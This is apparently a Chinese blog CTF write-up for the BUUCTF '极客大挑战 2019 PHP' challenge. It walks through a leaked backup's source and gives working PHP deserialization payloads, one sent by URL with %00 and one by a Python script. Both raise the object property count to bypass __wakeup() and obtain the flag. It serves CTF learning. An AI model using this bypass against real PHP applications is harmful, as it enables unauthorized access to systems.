BUU_Web 极客大挑战 PHP

最新推荐文章于 2024-05-31 13:15:26 发布
最新推荐文章于 2024-05-31 13:15:26 发布
阅读量1k 收藏
点赞数
分类专栏: BUU
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46635165/article/details/108988137
版权

考点:

打开解题网址:
提示备份,使用脚本扫描分析,得到一个 www.zip,下载;
在这里插入图片描述
zip包中最主要的两个文件 :index.php , class.php;
index.php 主要代码段分析:

    <?php
    include 'class.php';  # 将class.php文件包含
    $select = $_GET['select'];	# 获取 get 传参 select
    $res=unserialize(@$select);		# 对 select 进行反序列化,@压制提示警告;
    ?>

class.php 主要代码段分析:

<?php
include 'flag.php';


error_reporting(0);

# 定义一个 名为 Name 类
class Name{
    private $username = 'nonono';	#私有属性 username
    private $password = 'yesyes';	#私有属性 password

    public function __construct($username,$password){
        $this->username = $username;	# 对 username password 赋值
        $this->password = $password;
    }

	#__wakeup() 函数,unserialize()反序列化函数前调用;
    function __wakeup(){
        $this->username = 'guest';  #将 username 赋值 guest;
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        # 两个判断:
        #第一个if,password!=100,直接退出
        #第二个if,password=100,username做全等运算,不等,退出;全等 输出 flag;
        #也就是说,输出flag,需要满足 username=admin  password=100
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die(); 
        }
    }
}

代码分析已注释在代码段中,可以看见 index.php中 的 unserialize()和__wakeup() 函数,以及 get方式传参select ,参数可控,可以利用 __wakeup()函数漏洞来解题:
首先,直接利用 class.php 源码,输出 Name(‘admin’,100) 对象的序列化结果:

$s = new Name('admin',100);
echo serialize($s);

输出为:O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
Name:2 ,表示Name 类有两个属性,将 2改成 3或者>2的数,当表示对象属性个数的值 大于 真实属性个数的值 时,__wakeup()函数不被执行,这样就可以绕过__wakeup(),从而使 username === admin;

至此,需要注意: username 和 password 两个属性是私有属性(private),因此这两个属性在序列化后,输出的其实是 \0类名\0属性名 (\0 是 ascii 码值,空字符),但是在页面输出时无显示,复制的时候也会被删除,因此反序列化时需要手动添加 \0;

构造payload,两种方法:

第一种,直接在地址栏提交url , %00 被url 解码为 不可见的空字符,:

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

第二种,使用python 提交数据(因为如果使用地址栏提交 ,会使\0变成 \0字符,而不会被解析成 ascii 为 0 的空字符):

?select=O:4:"Name":3:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}

import requests

url = "http://b3d58d19-b7e6-474c-86ba-18e202eda5fb.node3.buuoj.cn/"

payload = '?select=O:4:"Name":3:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}'

respone = requests.get(str(url) + str(payload))

print(respone.text)

在这里插入图片描述
具体__wakeup()函数漏洞利用请参阅:
大佬的文章

我在干饭
关注
专栏目录
【网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 5340
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
2024年网络安全最新Buuctf-Web-[极客挑战 2024]EasySQL 1 题解及思路总结
2401_84264096的博客
05-03 1163
例如输入1)、1"、1-等,这些数字后面的字符不是闭合符,所以数据库会把这些输入的错误数据转换成正确的数据类型。但是,若输入的数字后面的字符恰好是闭合符,则会形成闭合。原理:当闭合字符遇到转义字符时,会被转义,那么没有闭合符的语句就不完整了,就会报错,通过报错信息我们就可以推断出闭合符。时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号。分析报错信息:看\斜杠后面跟着的字符,是什么字符,它的闭合字符就是什么,若是没有,就为数字型。可知此页面与数据库产生交互。
BUU WEB [极客挑战 2019]PHP
star_feather的博客
01-26 233
打开网页,是一个会动的猫,猫会盯着毛线球,还会伸爪子玩,咳咳,网页提示: 一看到备份,就直接扫描呗,扫到一个文件www.zip, 【插入扫描结果图片】 访问,下载,解压,查看: flag!可惜是假的…然后查看另外的文件,在index.php中发现了一段php代码: class.php里是一大段php代码: 审计完成后,大概是在index.php中包含class.php文件,然后get方式传入一个select参数,并且将结果反序列化,class.php中如果username=admin,passwor
buu web:[极客挑战 2019]PHP(源码泄漏+反序列化)
m0_55378150的博客
04-18 2273
打开靶场 提到了网站备份,说明可能存在源码泄漏,御剑或者dirsearch扫一下目录,扫出来一个www.zip 下载完打开看一看 直接看到了flag.php,继续打开 这玩意一看就是假的,还是老老实实的代码审计吧 先看index.php <!DOCTYPE html> <head> <meta charset="UTF-8"> <title>I have a cat!</title> <link re..
web | CTF】BUUCTF [极客挑战 2019]PHP 1
weixin_46301214的博客
08-28 419
首先是打印序列化出来的结果是自带类名的,这个一开始以为是个bug,后来发现flag需要这个,导致我也搞不懂为什么了。开始答题,题目说有备份,那就用工具或自己写个脚本去扫(主要看字典),拿CTF的字典一顿扫,发现有源码泄露。你在代码里直接转会自带这种%00,有特殊效果,不知道是截断还是其他效果,反正没有这东西就不通过。当然了,我也是看了答案再反推逻辑的,也不知后台服务器是不是真的这样写。所以就需要把序列化出来的字符串改动一下,从2个元素,改成3个元素。好了,懂开发,踩过坑之后,咱们继续踩坑……
[极客挑战 2019]PHP(反序列化)
最新发布
weixin_73236680的博客
05-31 924
如果存在__wakeup方法,调用unserilize()方法则先调用__wakeup方法,但是序列化字符串中表示。满足了username、password但wakeup还没有绕过。因为是get传参,代码要放在URL上,所以再加一个URL编码。他说有备份,先右键检查看看,没有东西,用其他工具扫一下。所以将对象中的变量数改成大于2就能跳过__wakeup。有一个状态码200的路径,访问并下载。__wakeup()魔术绕过方法。先输出一下序列化代码,便于理解。跳过__wakeup的执行。
BUUCTF系列 // [极客挑战 2019] Http
qq_45805420的博客
09-25 1566
前言 本题知识点:常用 HTTP 请求头 WP 打开题目,在页面中没有发现明显的提示,查看网页源码,经搜索后发现一个似乎存在猫腻的网页 ‘Secret.php’ 访问该页面,得到第一个提示 题目要求我们从 ‘https://www.Sycsecret.com’ 进入该页面,故使用 burpsuite 抓包,在请求头中增加 Referer 字段即可 Referer HTTP Referer是 header 的一部分,当浏览器向 Web 服务器发送请求的时候,一般会带上 Referer,告诉服务器该网页是从
buuctf web极客挑战 http 1
qq_50647304的博客
10-25 1445
进去之后先查看源码,发现一个网页‘Secret.php’ 点进去,题目要求我们从 ‘https://www.Sycsecret.com’ 进入该页面。 该题考的是http协议和请求头相关知识,一般放到burp suite中抓包改包 先抓包,并发送到repeater: 根据题目提示添加referer Referer: https://www.Sycsecret.com ps: Referer是HTTP请求Header的一部分,当浏览器向Web服务器发送请求的时候,请求头信息一般需要包含Refere
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
ccc6553584的博客
04-03 884
输入11"时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号username输入1时,形成的sql语句是username输入1"时,形成的sql语句是正确的当字符串内需要包含双引号时,除了使用转义字符外,也可以使用一对单引号来包括字符串。字符串内的双引号被视为普通字符,无需特殊处理同理,当字符串内需要包含单引号时,除了使用转义字符外,也可以使用一对双引号来包括字符串。字符串内的单引号被视为普通字符,无需特殊处理username输入的是1'
BUUCTF[极客挑战 2019]PHP1题解
cxm4545的博客
04-26 1048
想要得到flag,必须满足username===admin,password==100,于是我们就要绕过__wakeup()函数了。(Value是代码运行结果,这里要注意改一下参数个数以绕过__wakeup()函数)(1)进入靶机,我们看到网页提示:备份网站,这时候我们就应该想到有可能源码泄露了。很明显,用get传参,然后反序列化,其实这里就是一个反序列化的题目了。(5)在class.php中,我们观察一下这个Name类。(2)因此,写一个python脚本,扫描一下这个网站。(7)我们写一下代码。
Buuweb 极客挑战 2019PHP 1
F1or_的博客
09-07 1171
打开一看提示说有备份网站习惯,用工具扫一下发现了www.zip得到了网站备份。 得到了3个php 直接看到了flag.php打开一看 结果错误,怎么可能这么简单,orz 直接看另外两个php中的源码 index.php和class.php 一看就是反序列化 ...
BUUCTF WEB [极客挑战 2019]BuyFlag
Y1da的博客
04-17 637
BUUCTF WEB [极客挑战 2019]BuyFlag 进入环境后在MENU中发现PAYFLAG功能,点击进入,提示 FLAG FLAG NEED YOUR 100000000 MONEY ATTENTION If you want to buy the FLAG: You must be a student from CUIT!!! You must be answer the correct password!!! Only Cuit's students can buy the FLA
BUUCTF-web PHP[极客挑战] wp
想喝奶茶的胖大海
02-26 1076
检查 有一只超级可爱的猫猫哦,可以跟你玩毛球球 然后提示说有备份,可以扫一下 思路 跟进得到压缩包,解压得到3个文件 在index.php得到关键代码 <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> 由unserialize(...
BUUCTF WEB [极客挑战 2019]PHP
Y1da的博客
04-16 1036
BUUCTF WEB [极客挑战 2019]PHP 题目提示网站存在备份,使用御剑扫描目录,发现备份文件 http://9ce7b58e-0829-4ed4-b7ca-7a1b7fd02741.node4.buuoj.cn:81/www.zip 下载后解压,得到index.php、class.php、flag.php等文件。 index.php(部分代码) <?php include 'class.php'; $select = $_GET['select']; $res=unser
[极客挑战 2019]PHP
d0ud的博客
10-18 684
打开题目,提示备份网站,直接扫描目录,得到www.zip 解压得到class.php,index.php,flag.php等源码 index.php中关键代码为 <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> class.php为 <?php include 'flag.php'; error_reporting(0);
BUUCTF web writeup
热门推荐
stepone4ward的博客
09-11 2万+
buuctf题目的部分writeup,持续更新中
buuoj部分web题解
Lionel_kai的博客
09-01 1868
1.[HCTF 2018]WarmUp 没有什么提示,直接f12查看源码:发现有一个source.php的网站,尝试直接打开 http://be5d60aa-bc86-4414-8225-92ff9f8e70f8.node4.buuoj.cn:81/source.php 打开发现是一段php代码: 审计代码发现: mb_substr(str1,start,[length][,[str2]]):是在str1从start开始length为长度截取字符串,str2是表示字符编码 mb_str...
BUUCTF__[极客挑战 2019]PHP_题解
风过江南乱的博客
06-11 2209
前言 最近期末考试了,没时间做题,太难了。 期末考试真的烦,得冷静冷静。
BUUCTF-Web】 [极客挑战 2019]PHP
RexHa的博客
09-04 776
BUUCTF-Web】 [极客挑战 2019]PHP
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值